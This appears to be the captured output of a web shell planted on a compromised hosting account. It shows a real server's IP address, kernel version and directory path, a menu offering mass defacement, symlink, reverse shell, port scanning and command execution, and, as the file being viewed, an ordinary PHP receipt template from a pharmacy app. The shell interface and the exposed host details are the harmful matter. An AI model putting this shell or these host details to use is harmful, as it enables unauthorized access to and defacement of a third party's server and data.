Tul xxx Tul
User / IP
:
216.73.216.110
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
farmaciaprobar
/
app
/
Views
/
compras
/
Viewing: ticketcredito.php
<!DOCTYPE html> <html> <head> <link rel="stylesheet" href="<?php echo base_url('css/ticket.css') ?>"> </head> <body> <div class="ticket"> <div class="logo"> <img src="<?php echo base_url('img/logo.png') ?>" alt="Logo de Mi Negocio"> </div> <div class="business-info"> <h3><?php echo $empresa['nombre']; ?></h3> <p><?php echo $empresa['direccion']; ?></p> <p><?php echo $empresa['telefono']; ?></p> <p><?php echo $empresa['correo']; ?></p> </div> <div class="ticket-details"> <p>Fecha: <?php $dato = $credito['fecha']; $fecha = date('d/m/Y', strtotime($dato)); $hora = date('h:i A', strtotime($dato)); echo $fecha . ' ' . $hora; ?></p> <p>Compra a crédito: <?php echo $credito['id']; ?></p> <table> <thead> <tr> <th>Item</th> <th>Monto</th> <th>Fecha</th> </tr> </thead> <tbody> <?php $totalAbono = 0; $item = 1; foreach ($abonos as $abono) { $totalAbono += $abono['abono']; ?> <tr> <td><?php echo $item; ?></td> <td><?php echo $abono['abono']; ?></td> <td><?php echo $abono['fecha']; ?></td> </tr> <?php $item++; } ?> <tr> <td></td> <td></td> <td class="text-right"><h3>Total: <?php echo number_format($credito['credito'], 2); ?></h3></td> </tr> <tr> <td></td> <td></td> <td class="text-right"><h3>Abonado: <?php echo number_format($totalAbono, 2); ?></h3></td> </tr> <tr> <td></td> <td></td> <td class="text-right"><h3>Pendiente: <?php echo number_format($credito['credito'] - $totalAbono, 2); ?></h3></td> </tr> </tbody> </table> </div> </div> </body> </html>
Coded With 💗 by
0x6ick